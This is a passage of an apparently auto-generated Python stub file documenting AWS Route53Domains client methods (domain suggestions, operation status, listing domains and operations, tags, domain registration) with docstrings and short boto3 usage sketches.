DONT_KNOW
The TLD registry didn\'t reply with a definitive answer about whether the domain name is available. Route 53 can return this response for a variety of reasons, for example, the registry is performing maintenance. Try again later.
PENDING
The TLD registry didn\'t return a response in the expected amount of time. When the response is delayed, it usually takes just a few extra seconds. You can resubmit the request immediately.
RESERVED
The domain name has been reserved for another person or organization.
UNAVAILABLE
The domain name is not available.
UNAVAILABLE_PREMIUM
The domain name is not available.
UNAVAILABLE_RESTRICTED
The domain name is forbidden.
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.UnsupportedTLD
:return: {
'SuggestionsList': [
{
'DomainName': 'string',
'Availability': 'string'
},
]
}
:returns:
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.UnsupportedTLD
"""
pass
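# Illustrative sketch: asking for up to five available alternatives to a seed name.
# The seed domain is a placeholder; credentials are assumed.
def _example_get_domain_suggestions():
    import boto3
    client = boto3.client('route53domains', region_name='us-east-1')
    response = client.get_domain_suggestions(
        DomainName='example.com',
        SuggestionCount=5,
        OnlyAvailable=True,
    )
    for suggestion in response['SuggestionsList']:
        print(suggestion['DomainName'], suggestion['Availability'])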
def get_operation_detail(OperationId=None):
"""
This operation returns the current status of an operation that is not completed.
See also: AWS API Documentation
Exceptions
:example: response = client.get_operation_detail(
OperationId='string'
)
:type OperationId: string
:param OperationId: [REQUIRED]\nThe identifier for the operation for which you want to get the status. Route 53 returned the identifier in the response to the original request.\n
:rtype: dict
ReturnsResponse Syntax
{
'OperationId': 'string',
'Status': 'SUBMITTED'|'IN_PROGRESS'|'ERROR'|'SUCCESSFUL'|'FAILED',
'Message': 'string',
'DomainName': 'string',
'Type': 'REGISTER_DOMAIN'|'DELETE_DOMAIN'|'TRANSFER_IN_DOMAIN'|'UPDATE_DOMAIN_CONTACT'|'UPDATE_NAMESERVER'|'CHANGE_PRIVACY_PROTECTION'|'DOMAIN_LOCK'|'ENABLE_AUTORENEW'|'DISABLE_AUTORENEW'|'ADD_DNSSEC'|'REMOVE_DNSSEC'|'EXPIRE_DOMAIN'|'TRANSFER_OUT_DOMAIN'|'CHANGE_DOMAIN_OWNER'|'RENEW_DOMAIN'|'PUSH_DOMAIN'|'INTERNAL_TRANSFER_OUT_DOMAIN'|'INTERNAL_TRANSFER_IN_DOMAIN',
'SubmittedDate': datetime(2015, 1, 1)
}
Response Structure
(dict) --The GetOperationDetail response includes the following elements.
OperationId (string) --The identifier for the operation.
Status (string) --The current status of the requested operation in the system.
Message (string) --Detailed information on the status including possible errors.
DomainName (string) --The name of a domain.
Type (string) --The type of operation that was requested.
SubmittedDate (datetime) --The date when the request was submitted.
Exceptions
Route53Domains.Client.exceptions.InvalidInput
:return: {
'OperationId': 'string',
'Status': 'SUBMITTED'|'IN_PROGRESS'|'ERROR'|'SUCCESSFUL'|'FAILED',
'Message': 'string',
'DomainName': 'string',
'Type': 'REGISTER_DOMAIN'|'DELETE_DOMAIN'|'TRANSFER_IN_DOMAIN'|'UPDATE_DOMAIN_CONTACT'|'UPDATE_NAMESERVER'|'CHANGE_PRIVACY_PROTECTION'|'DOMAIN_LOCK'|'ENABLE_AUTORENEW'|'DISABLE_AUTORENEW'|'ADD_DNSSEC'|'REMOVE_DNSSEC'|'EXPIRE_DOMAIN'|'TRANSFER_OUT_DOMAIN'|'CHANGE_DOMAIN_OWNER'|'RENEW_DOMAIN'|'PUSH_DOMAIN'|'INTERNAL_TRANSFER_OUT_DOMAIN'|'INTERNAL_TRANSFER_IN_DOMAIN',
'SubmittedDate': datetime(2015, 1, 1)
}
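Usage sketch (illustrative; the operation ID below is a placeholder for a value returned by a prior request such as register_domain):
    import boto3
    client = boto3.client('route53domains')
    detail = client.get_operation_detail(OperationId='replace-with-a-real-operation-id')
    print(detail['Status'], detail['Type'], detail['SubmittedDate'])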
"""
pass
def get_paginator(operation_name=None):
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
:rtype: L{botocore.paginate.Paginator}
ReturnsA paginator object.
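Usage sketch (illustrative; assumes the list_domains operation is pageable in your botocore release, which it is in current versions):
    import boto3
    client = boto3.client('route53domains')
    paginator = client.get_paginator('list_domains')
    for page in paginator.paginate():
        for domain in page['Domains']:
            print(domain['DomainName'])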
"""
pass
def get_waiter(waiter_name=None):
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters\nsection of the service docs for a list of available waiters.
:rtype: botocore.waiter.Waiter
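Usage sketch (illustrative; Route53Domains may not define any waiters, so inspect waiter_names before calling get_waiter):
    import boto3
    client = boto3.client('route53domains')
    print(client.waiter_names)  # often an empty list for this service
    # If a waiter existed, it would be used as follows (name purely hypothetical):
    # waiter = client.get_waiter('domain_registered')
    # waiter.wait(DomainName='example.com')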
"""
pass
def list_domains(Marker=None, MaxItems=None):
"""
This operation returns all the domain names registered with Amazon Route 53 for the current AWS account.
See also: AWS API Documentation
Exceptions
:example: response = client.list_domains(
Marker='string',
MaxItems=123
)
:type Marker: string
:param Marker: For an initial request for a list of domains, omit this element. If the number of domains that are associated with the current AWS account is greater than the value that you specified for MaxItems , you can use Marker to return additional domains. Get the value of NextPageMarker from the previous response, and submit another request that includes the value of NextPageMarker in the Marker element.\nConstraints: The marker must match the value specified in the previous request.\n
:type MaxItems: integer
:param MaxItems: Number of domains to be returned.\nDefault: 20\n
:rtype: dict
ReturnsResponse Syntax
{
'Domains': [
{
'DomainName': 'string',
'AutoRenew': True|False,
'TransferLock': True|False,
'Expiry': datetime(2015, 1, 1)
},
],
'NextPageMarker': 'string'
}
Response Structure
(dict) --
The ListDomains response includes the following elements.
Domains (list) --
A summary of domains.
(dict) --
Summary information about one domain.
DomainName (string) --
The name of the domain that the summary information applies to.
AutoRenew (boolean) --
Indicates whether the domain is automatically renewed upon expiration.
TransferLock (boolean) --
Indicates whether a domain is locked from unauthorized transfer to another party.
Expiry (datetime) --
Expiration date of the domain in Unix time format and Coordinated Universal Time (UTC).
NextPageMarker (string) --
If there are more domains than you specified for MaxItems in the request, submit another request and include the value of NextPageMarker in the value of Marker .
Exceptions
Route53Domains.Client.exceptions.InvalidInput
:return: {
'Domains': [
{
'DomainName': 'string',
'AutoRenew': True|False,
'TransferLock': True|False,
'Expiry': datetime(2015, 1, 1)
},
],
'NextPageMarker': 'string'
}
:returns:
Route53Domains.Client.exceptions.InvalidInput
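Usage sketch (illustrative; shows manual pagination with Marker/NextPageMarker, assuming AWS credentials are configured):
    import boto3
    client = boto3.client('route53domains')
    domains = []
    kwargs = {'MaxItems': 20}
    while True:
        page = client.list_domains(**kwargs)
        domains.extend(page['Domains'])
        marker = page.get('NextPageMarker')
        if not marker:
            break
        kwargs['Marker'] = marker
    print([d['DomainName'] for d in domains])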
"""
pass
def list_operations(SubmittedSince=None, Marker=None, MaxItems=None):
"""
Returns information about all of the operations that return an operation ID and that have ever been performed on domains that were registered by the current account.
See also: AWS API Documentation
Exceptions
:example: response = client.list_operations(
SubmittedSince=datetime(2015, 1, 1),
Marker='string',
MaxItems=123
)
:type SubmittedSince: datetime
:param SubmittedSince: An optional parameter that lets you get information about all the operations that you submitted after a specified date and time. Specify the date and time in Unix time format and Coordinated Universal Time (UTC).
:type Marker: string
:param Marker: For an initial request for a list of operations, omit this element. If the number of operations that are not yet complete is greater than the value that you specified for MaxItems , you can use Marker to return additional operations. Get the value of NextPageMarker from the previous response, and submit another request that includes the value of NextPageMarker in the Marker element.
:type MaxItems: integer
:param MaxItems: Number of operations to be returned.\nDefault: 20\n
:rtype: dict
ReturnsResponse Syntax
{
'Operations': [
{
'OperationId': 'string',
'Status': 'SUBMITTED'|'IN_PROGRESS'|'ERROR'|'SUCCESSFUL'|'FAILED',
'Type': 'REGISTER_DOMAIN'|'DELETE_DOMAIN'|'TRANSFER_IN_DOMAIN'|'UPDATE_DOMAIN_CONTACT'|'UPDATE_NAMESERVER'|'CHANGE_PRIVACY_PROTECTION'|'DOMAIN_LOCK'|'ENABLE_AUTORENEW'|'DISABLE_AUTORENEW'|'ADD_DNSSEC'|'REMOVE_DNSSEC'|'EXPIRE_DOMAIN'|'TRANSFER_OUT_DOMAIN'|'CHANGE_DOMAIN_OWNER'|'RENEW_DOMAIN'|'PUSH_DOMAIN'|'INTERNAL_TRANSFER_OUT_DOMAIN'|'INTERNAL_TRANSFER_IN_DOMAIN',
'SubmittedDate': datetime(2015, 1, 1)
},
],
'NextPageMarker': 'string'
}
Response Structure
(dict) --
The ListOperations response includes the following elements.
Operations (list) --
Lists summaries of the operations.
(dict) --
OperationSummary includes the following elements.
OperationId (string) --
Identifier returned to track the requested action.
Status (string) --
The current status of the requested operation in the system.
Type (string) --
Type of the action requested.
SubmittedDate (datetime) --
The date when the request was submitted.
NextPageMarker (string) --
If there are more operations than you specified for MaxItems in the request, submit another request and include the value of NextPageMarker in the value of Marker .
Exceptions
Route53Domains.Client.exceptions.InvalidInput
:return: {
'Operations': [
{
'OperationId': 'string',
'Status': 'SUBMITTED'|'IN_PROGRESS'|'ERROR'|'SUCCESSFUL'|'FAILED',
'Type': 'REGISTER_DOMAIN'|'DELETE_DOMAIN'|'TRANSFER_IN_DOMAIN'|'UPDATE_DOMAIN_CONTACT'|'UPDATE_NAMESERVER'|'CHANGE_PRIVACY_PROTECTION'|'DOMAIN_LOCK'|'ENABLE_AUTORENEW'|'DISABLE_AUTORENEW'|'ADD_DNSSEC'|'REMOVE_DNSSEC'|'EXPIRE_DOMAIN'|'TRANSFER_OUT_DOMAIN'|'CHANGE_DOMAIN_OWNER'|'RENEW_DOMAIN'|'PUSH_DOMAIN'|'INTERNAL_TRANSFER_OUT_DOMAIN'|'INTERNAL_TRANSFER_IN_DOMAIN',
'SubmittedDate': datetime(2015, 1, 1)
},
],
'NextPageMarker': 'string'
}
:returns:
Route53Domains.Client.exceptions.InvalidInput
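Usage sketch (illustrative; lists operations submitted in the last 30 days, assuming AWS credentials are configured):
    from datetime import datetime, timedelta, timezone
    import boto3
    client = boto3.client('route53domains')
    response = client.list_operations(
        SubmittedSince=datetime.now(timezone.utc) - timedelta(days=30),
        MaxItems=20
    )
    for op in response['Operations']:
        print(op['OperationId'], op['Status'], op['Type'])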
"""
pass
def list_tags_for_domain(DomainName=None):
"""
This operation returns all of the tags that are associated with the specified domain.
All tag operations are eventually consistent; subsequent operations might not immediately represent all issued operations.
See also: AWS API Documentation
Exceptions
:example: response = client.list_tags_for_domain(
DomainName='string'
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe domain for which you want to get a list of tags.\n
:rtype: dict
ReturnsResponse Syntax
{
'TagList': [
{
'Key': 'string',
'Value': 'string'
},
]
}
Response Structure
(dict) --The ListTagsForDomain response includes the following elements.
TagList (list) --A list of the tags that are associated with the specified domain.
(dict) --Each tag includes the following elements.
Key (string) --The key (name) of a tag.
Valid values: A-Z, a-z, 0-9, space, ".:/=+-@"
Constraints: Each key can be 1-128 characters long.
Value (string) --The value of a tag.
Valid values: A-Z, a-z, 0-9, space, ".:/=+-@"
Constraints: Each value can be 0-256 characters long.
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.OperationLimitExceeded
Route53Domains.Client.exceptions.UnsupportedTLD
:return: {
'TagList': [
{
'Key': 'string',
'Value': 'string'
},
]
}
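Usage sketch (illustrative; 'example.com' is a placeholder for a domain registered in the current account):
    import boto3
    client = boto3.client('route53domains')
    response = client.list_tags_for_domain(DomainName='example.com')
    for tag in response['TagList']:
        print(tag['Key'], '=', tag['Value'])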
"""
pass
def register_domain(DomainName=None, IdnLangCode=None, DurationInYears=None, AutoRenew=None, AdminContact=None, RegistrantContact=None, TechContact=None, PrivacyProtectAdminContact=None, PrivacyProtectRegistrantContact=None, PrivacyProtectTechContact=None):
"""
This operation registers a domain. Domains are registered either by Amazon Registrar (for .com, .net, and .org domains) or by our registrar associate, Gandi (for all other domains). For some top-level domains (TLDs), this operation requires extra parameters.
When you register a domain, Amazon Route 53 does the following:
See also: AWS API Documentation
Exceptions
:example: response = client.register_domain(
DomainName='string',
IdnLangCode='string',
DurationInYears=123,
AutoRenew=True|False,
AdminContact={
'FirstName': 'string',
'LastName': 'string',
'ContactType': 'PERSON'|'COMPANY'|'ASSOCIATION'|'PUBLIC_BODY'|'RESELLER',
'OrganizationName': 'string',
'AddressLine1': 'string',
'AddressLine2': 'string',
'City': 'string',
'State': 'string',
'CountryCode': 'AD'|'AE'|'AF'|'AG'|'AI'|'AL'|'AM'|'AN'|'AO'|'AQ'|'AR'|'AS'|'AT'|'AU'|'AW'|'AZ'|'BA'|'BB'|'BD'|'BE'|'BF'|'BG'|'BH'|'BI'|'BJ'|'BL'|'BM'|'BN'|'BO'|'BR'|'BS'|'BT'|'BW'|'BY'|'BZ'|'CA'|'CC'|'CD'|'CF'|'CG'|'CH'|'CI'|'CK'|'CL'|'CM'|'CN'|'CO'|'CR'|'CU'|'CV'|'CX'|'CY'|'CZ'|'DE'|'DJ'|'DK'|'DM'|'DO'|'DZ'|'EC'|'EE'|'EG'|'ER'|'ES'|'ET'|'FI'|'FJ'|'FK'|'FM'|'FO'|'FR'|'GA'|'GB'|'GD'|'GE'|'GH'|'GI'|'GL'|'GM'|'GN'|'GQ'|'GR'|'GT'|'GU'|'GW'|'GY'|'HK'|'HN'|'HR'|'HT'|'HU'|'ID'|'IE'|'IL'|'IM'|'IN'|'IQ'|'IR'|'IS'|'IT'|'JM'|'JO'|'JP'|'KE'|'KG'|'KH'|'KI'|'KM'|'KN'|'KP'|'KR'|'KW'|'KY'|'KZ'|'LA'|'LB'|'LC'|'LI'|'LK'|'LR'|'LS'|'LT'|'LU'|'LV'|'LY'|'MA'|'MC'|'MD'|'ME'|'MF'|'MG'|'MH'|'MK'|'ML'|'MM'|'MN'|'MO'|'MP'|'MR'|'MS'|'MT'|'MU'|'MV'|'MW'|'MX'|'MY'|'MZ'|'NA'|'NC'|'NE'|'NG'|'NI'|'NL'|'NO'|'NP'|'NR'|'NU'|'NZ'|'OM'|'PA'|'PE'|'PF'|'PG'|'PH'|'PK'|'PL'|'PM'|'PN'|'PR'|'PT'|'PW'|'PY'|'QA'|'RO'|'RS'|'RU'|'RW'|'SA'|'SB'|'SC'|'SD'|'SE'|'SG'|'SH'|'SI'|'SK'|'SL'|'SM'|'SN'|'SO'|'SR'|'ST'|'SV'|'SY'|'SZ'|'TC'|'TD'|'TG'|'TH'|'TJ'|'TK'|'TL'|'TM'|'TN'|'TO'|'TR'|'TT'|'TV'|'TW'|'TZ'|'UA'|'UG'|'US'|'UY'|'UZ'|'VA'|'VC'|'VE'|'VG'|'VI'|'VN'|'VU'|'WF'|'WS'|'YE'|'YT'|'ZA'|'ZM'|'ZW',
'ZipCode': 'string',
'PhoneNumber': 'string',
'Email': 'string',
'Fax': 'string',
'ExtraParams': [
{
'Name': 'DUNS_NUMBER'|'BRAND_NUMBER'|'BIRTH_DEPARTMENT'|'BIRTH_DATE_IN_YYYY_MM_DD'|'BIRTH_COUNTRY'|'BIRTH_CITY'|'DOCUMENT_NUMBER'|'AU_ID_NUMBER'|'AU_ID_TYPE'|'CA_LEGAL_TYPE'|'CA_BUSINESS_ENTITY_TYPE'|'CA_LEGAL_REPRESENTATIVE'|'CA_LEGAL_REPRESENTATIVE_CAPACITY'|'ES_IDENTIFICATION'|'ES_IDENTIFICATION_TYPE'|'ES_LEGAL_FORM'|'FI_BUSINESS_NUMBER'|'FI_ID_NUMBER'|'FI_NATIONALITY'|'FI_ORGANIZATION_TYPE'|'IT_NATIONALITY'|'IT_PIN'|'IT_REGISTRANT_ENTITY_TYPE'|'RU_PASSPORT_DATA'|'SE_ID_NUMBER'|'SG_ID_NUMBER'|'VAT_NUMBER'|'UK_CONTACT_TYPE'|'UK_COMPANY_NUMBER',
'Value': 'string'
},
]
},
RegistrantContact={
'FirstName': 'string',
'LastName': 'string',
'ContactType': 'PERSON'|'COMPANY'|'ASSOCIATION'|'PUBLIC_BODY'|'RESELLER',
'OrganizationName': 'string',
'AddressLine1': 'string',
'AddressLine2': 'string',
'City': 'string',
'State': 'string',
'CountryCode': 'AD'|'AE'|'AF'|'AG'|'AI'|'AL'|'AM'|'AN'|'AO'|'AQ'|'AR'|'AS'|'AT'|'AU'|'AW'|'AZ'|'BA'|'BB'|'BD'|'BE'|'BF'|'BG'|'BH'|'BI'|'BJ'|'BL'|'BM'|'BN'|'BO'|'BR'|'BS'|'BT'|'BW'|'BY'|'BZ'|'CA'|'CC'|'CD'|'CF'|'CG'|'CH'|'CI'|'CK'|'CL'|'CM'|'CN'|'CO'|'CR'|'CU'|'CV'|'CX'|'CY'|'CZ'|'DE'|'DJ'|'DK'|'DM'|'DO'|'DZ'|'EC'|'EE'|'EG'|'ER'|'ES'|'ET'|'FI'|'FJ'|'FK'|'FM'|'FO'|'FR'|'GA'|'GB'|'GD'|'GE'|'GH'|'GI'|'GL'|'GM'|'GN'|'GQ'|'GR'|'GT'|'GU'|'GW'|'GY'|'HK'|'HN'|'HR'|'HT'|'HU'|'ID'|'IE'|'IL'|'IM'|'IN'|'IQ'|'IR'|'IS'|'IT'|'JM'|'JO'|'JP'|'KE'|'KG'|'KH'|'KI'|'KM'|'KN'|'KP'|'KR'|'KW'|'KY'|'KZ'|'LA'|'LB'|'LC'|'LI'|'LK'|'LR'|'LS'|'LT'|'LU'|'LV'|'LY'|'MA'|'MC'|'MD'|'ME'|'MF'|'MG'|'MH'|'MK'|'ML'|'MM'|'MN'|'MO'|'MP'|'MR'|'MS'|'MT'|'MU'|'MV'|'MW'|'MX'|'MY'|'MZ'|'NA'|'NC'|'NE'|'NG'|'NI'|'NL'|'NO'|'NP'|'NR'|'NU'|'NZ'|'OM'|'PA'|'PE'|'PF'|'PG'|'PH'|'PK'|'PL'|'PM'|'PN'|'PR'|'PT'|'PW'|'PY'|'QA'|'RO'|'RS'|'RU'|'RW'|'SA'|'SB'|'SC'|'SD'|'SE'|'SG'|'SH'|'SI'|'SK'|'SL'|'SM'|'SN'|'SO'|'SR'|'ST'|'SV'|'SY'|'SZ'|'TC'|'TD'|'TG'|'TH'|'TJ'|'TK'|'TL'|'TM'|'TN'|'TO'|'TR'|'TT'|'TV'|'TW'|'TZ'|'UA'|'UG'|'US'|'UY'|'UZ'|'VA'|'VC'|'VE'|'VG'|'VI'|'VN'|'VU'|'WF'|'WS'|'YE'|'YT'|'ZA'|'ZM'|'ZW',
'ZipCode': 'string',
'PhoneNumber': 'string',
'Email': 'string',
'Fax': 'string',
'ExtraParams': [
{
'Name': 'DUNS_NUMBER'|'BRAND_NUMBER'|'BIRTH_DEPARTMENT'|'BIRTH_DATE_IN_YYYY_MM_DD'|'BIRTH_COUNTRY'|'BIRTH_CITY'|'DOCUMENT_NUMBER'|'AU_ID_NUMBER'|'AU_ID_TYPE'|'CA_LEGAL_TYPE'|'CA_BUSINESS_ENTITY_TYPE'|'CA_LEGAL_REPRESENTATIVE'|'CA_LEGAL_REPRESENTATIVE_CAPACITY'|'ES_IDENTIFICATION'|'ES_IDENTIFICATION_TYPE'|'ES_LEGAL_FORM'|'FI_BUSINESS_NUMBER'|'FI_ID_NUMBER'|'FI_NATIONALITY'|'FI_ORGANIZATION_TYPE'|'IT_NATIONALITY'|'IT_PIN'|'IT_REGISTRANT_ENTITY_TYPE'|'RU_PASSPORT_DATA'|'SE_ID_NUMBER'|'SG_ID_NUMBER'|'VAT_NUMBER'|'UK_CONTACT_TYPE'|'UK_COMPANY_NUMBER',
'Value': 'string'
},
]
},
TechContact={
'FirstName': 'string',
'LastName': 'string',
'ContactType': 'PERSON'|'COMPANY'|'ASSOCIATION'|'PUBLIC_BODY'|'RESELLER',
'OrganizationName': 'string',
'AddressLine1': 'string',
'AddressLine2': 'string',
'City': 'string',
'State': 'string',
'CountryCode': 'AD'|'AE'|'AF'|'AG'|'AI'|'AL'|'AM'|'AN'|'AO'|'AQ'|'AR'|'AS'|'AT'|'AU'|'AW'|'AZ'|'BA'|'BB'|'BD'|'BE'|'BF'|'BG'|'BH'|'BI'|'BJ'|'BL'|'BM'|'BN'|'BO'|'BR'|'BS'|'BT'|'BW'|'BY'|'BZ'|'CA'|'CC'|'CD'|'CF'|'CG'|'CH'|'CI'|'CK'|'CL'|'CM'|'CN'|'CO'|'CR'|'CU'|'CV'|'CX'|'CY'|'CZ'|'DE'|'DJ'|'DK'|'DM'|'DO'|'DZ'|'EC'|'EE'|'EG'|'ER'|'ES'|'ET'|'FI'|'FJ'|'FK'|'FM'|'FO'|'FR'|'GA'|'GB'|'GD'|'GE'|'GH'|'GI'|'GL'|'GM'|'GN'|'GQ'|'GR'|'GT'|'GU'|'GW'|'GY'|'HK'|'HN'|'HR'|'HT'|'HU'|'ID'|'IE'|'IL'|'IM'|'IN'|'IQ'|'IR'|'IS'|'IT'|'JM'|'JO'|'JP'|'KE'|'KG'|'KH'|'KI'|'KM'|'KN'|'KP'|'KR'|'KW'|'KY'|'KZ'|'LA'|'LB'|'LC'|'LI'|'LK'|'LR'|'LS'|'LT'|'LU'|'LV'|'LY'|'MA'|'MC'|'MD'|'ME'|'MF'|'MG'|'MH'|'MK'|'ML'|'MM'|'MN'|'MO'|'MP'|'MR'|'MS'|'MT'|'MU'|'MV'|'MW'|'MX'|'MY'|'MZ'|'NA'|'NC'|'NE'|'NG'|'NI'|'NL'|'NO'|'NP'|'NR'|'NU'|'NZ'|'OM'|'PA'|'PE'|'PF'|'PG'|'PH'|'PK'|'PL'|'PM'|'PN'|'PR'|'PT'|'PW'|'PY'|'QA'|'RO'|'RS'|'RU'|'RW'|'SA'|'SB'|'SC'|'SD'|'SE'|'SG'|'SH'|'SI'|'SK'|'SL'|'SM'|'SN'|'SO'|'SR'|'ST'|'SV'|'SY'|'SZ'|'TC'|'TD'|'TG'|'TH'|'TJ'|'TK'|'TL'|'TM'|'TN'|'TO'|'TR'|'TT'|'TV'|'TW'|'TZ'|'UA'|'UG'|'US'|'UY'|'UZ'|'VA'|'VC'|'VE'|'VG'|'VI'|'VN'|'VU'|'WF'|'WS'|'YE'|'YT'|'ZA'|'ZM'|'ZW',
'ZipCode': 'string',
'PhoneNumber': 'string',
'Email': 'string',
'Fax': 'string',
'ExtraParams': [
{
'Name': 'DUNS_NUMBER'|'BRAND_NUMBER'|'BIRTH_DEPARTMENT'|'BIRTH_DATE_IN_YYYY_MM_DD'|'BIRTH_COUNTRY'|'BIRTH_CITY'|'DOCUMENT_NUMBER'|'AU_ID_NUMBER'|'AU_ID_TYPE'|'CA_LEGAL_TYPE'|'CA_BUSINESS_ENTITY_TYPE'|'CA_LEGAL_REPRESENTATIVE'|'CA_LEGAL_REPRESENTATIVE_CAPACITY'|'ES_IDENTIFICATION'|'ES_IDENTIFICATION_TYPE'|'ES_LEGAL_FORM'|'FI_BUSINESS_NUMBER'|'FI_ID_NUMBER'|'FI_NATIONALITY'|'FI_ORGANIZATION_TYPE'|'IT_NATIONALITY'|'IT_PIN'|'IT_REGISTRANT_ENTITY_TYPE'|'RU_PASSPORT_DATA'|'SE_ID_NUMBER'|'SG_ID_NUMBER'|'VAT_NUMBER'|'UK_CONTACT_TYPE'|'UK_COMPANY_NUMBER',
'Value': 'string'
},
]
},
PrivacyProtectAdminContact=True|False,
PrivacyProtectRegistrantContact=True|False,
PrivacyProtectTechContact=True|False
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe domain name that you want to register. The top-level domain (TLD), such as .com, must be a TLD that Route 53 supports. For a list of supported TLDs, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide .\nThe domain name can contain only the following characters:\n\nLetters a through z. Domain names are not case sensitive.\nNumbers 0 through 9.\nHyphen (-). You can\'t specify a hyphen at the beginning or end of a label.\nPeriod (.) to separate the labels in the name, such as the . in example.com .\n\nInternationalized domain names are not supported for some top-level domains. To determine whether the TLD that you want to use supports internationalized domain names, see Domains that You Can Register with Amazon Route 53 . For more information, see Formatting Internationalized Domain Names .\n
:type IdnLangCode: string
:param IdnLangCode: Reserved for future use.
:type DurationInYears: integer
:param DurationInYears: [REQUIRED]\nThe number of years that you want to register the domain for. Domains are registered for a minimum of one year. The maximum period depends on the top-level domain. For the range of valid values for your domain, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide .\nDefault: 1\n
:type AutoRenew: boolean
:param AutoRenew: Indicates whether the domain will be automatically renewed (true ) or not (false ). Autorenewal only takes effect after the account is charged.\nDefault: true\n
:type AdminContact: dict
:param AdminContact: [REQUIRED]\nProvides detailed contact information. For information about the values that you specify for each element, see ContactDetail .\n\nFirstName (string) --First name of contact.\n\nLastName (string) --Last name of contact.\n\nContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:\n\nIf you specify a value other than PERSON , you must also specify a value for OrganizationName .\nFor some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide\nFor .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .\n\n\nOrganizationName (string) --Name of the organization for contact types other than PERSON .\n\nAddressLine1 (string) --First line of the contact\'s address.\n\nAddressLine2 (string) --Second line of contact\'s address, if any.\n\nCity (string) --The city of the contact\'s address.\n\nState (string) --The state or province of the contact\'s city.\n\nCountryCode (string) --Code for the country of the contact\'s address.\n\nZipCode (string) --The zip or postal code of the contact\'s address.\n\nPhoneNumber (string) --The phone number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code>]'. For example, a US phone number might appear as '+1.1234567890' .\n\nEmail (string) --Email address of the contact.\n\nFax (string) --Fax number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code]'. For example, a US phone number might appear as '+1.1234567890' .\n\nExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.\n\n(dict) --ExtraParam includes the following elements.\n\nName (string) -- [REQUIRED]The name of an additional parameter that is required by a top-level domain. 
Here are the top-level domains that require additional parameters and the names of the parameters that they require:\n\n.com.au and .net.au\n\nAU_ID_NUMBER\nAU_ID_TYPE Valid values include the following:\nABN (Australian business number)\nACN (Australian company number)\nTM (Trademark number)\n\n.ca\n\nBRAND_NUMBER\nCA_BUSINESS_ENTITY_TYPE Valid values include the following:\nBANK (Bank)\nCOMMERCIAL_COMPANY (Commercial company)\nCOMPANY (Company)\nCOOPERATION (Cooperation)\nCOOPERATIVE (Cooperative)\nCOOPRIX (Cooprix)\nCORP (Corporation)\nCREDIT_UNION (Credit union)\nFOMIA (Federation of mutual insurance associations)\nINC (Incorporated)\nLTD (Limited)\nLTEE (Limit\xc3\xa9e)\nLLC (Limited liability corporation)\nLLP (Limited liability partnership)\nLTE (Lte.)\nMBA (Mutual benefit association)\nMIC (Mutual insurance company)\nNFP (Not-for-profit corporation)\nSA (S.A.)\nSAVINGS_COMPANY (Savings company)\nSAVINGS_UNION (Savings union)\nSARL (Soci\xc3\xa9t\xc3\xa9 \xc3\xa0 responsabilit\xc3\xa9 limit\xc3\xa9e)\nTRUST (Trust)\nULC (Unlimited liability corporation)\n\n\nCA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:\nABO (Aboriginal Peoples indigenous to Canada)\nCCT (Canadian citizen)\nLGR (Legal Representative of a Canadian Citizen or Permanent Resident)\nRES (Permanent resident of Canada)\n\n\n\nWhen ContactType is a value other than PERSON , valid values include the following:\n\n\nASS (Canadian unincorporated association)\nCCO (Canadian corporation)\nEDU (Canadian educational institution)\nGOV (Government or government entity in Canada)\nHOP (Canadian Hospital)\nINB (Indian Band recognized by the Indian Act of Canada)\nLAM (Canadian Library, Archive, or Museum)\nMAJ (Her/His Majesty the Queen/King)\nOMK (Official mark registered in Canada)\nPLT (Canadian Political Party)\nPRT (Partnership Registered in Canada)\nTDM (Trademark registered in Canada)\nTRD (Canadian Trade Union)\nTRS (Trust established in Canada)\n\n.es\n\n\nES_IDENTIFICATION Specify the applicable value:\nFor contacts inside Spain: Enter your passport ID.\nFor contacts outside of Spain: Enter the VAT identification number for the company.\n\n\nNote\nFor .es domains, the value of ContactType must be PERSON .\n\n\nES_IDENTIFICATION_TYPE Valid values include the following:\nDNI_AND_NIF (For Spanish contacts)\nNIE (For foreigners with legal residence)\nOTHER (For contacts outside of Spain)\n\n\nES_LEGAL_FORM Valid values include the following:\nASSOCIATION\nCENTRAL_GOVERNMENT_BODY\nCIVIL_SOCIETY\nCOMMUNITY_OF_OWNERS\nCOMMUNITY_PROPERTY\nCONSULATE\nCOOPERATIVE\nDESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL\nECONOMIC_INTEREST_GROUP\nEMBASSY\nENTITY_MANAGING_NATURAL_AREAS\nFARM_PARTNERSHIP\nFOUNDATION\nGENERAL_AND_LIMITED_PARTNERSHIP\nGENERAL_PARTNERSHIP\nINDIVIDUAL\nLIMITED_COMPANY\nLOCAL_AUTHORITY\nLOCAL_PUBLIC_ENTITY\nMUTUAL_INSURANCE_COMPANY\nNATIONAL_PUBLIC_ENTITY\nORDER_OR_RELIGIOUS_INSTITUTION\nOTHERS (Only for contacts outside of 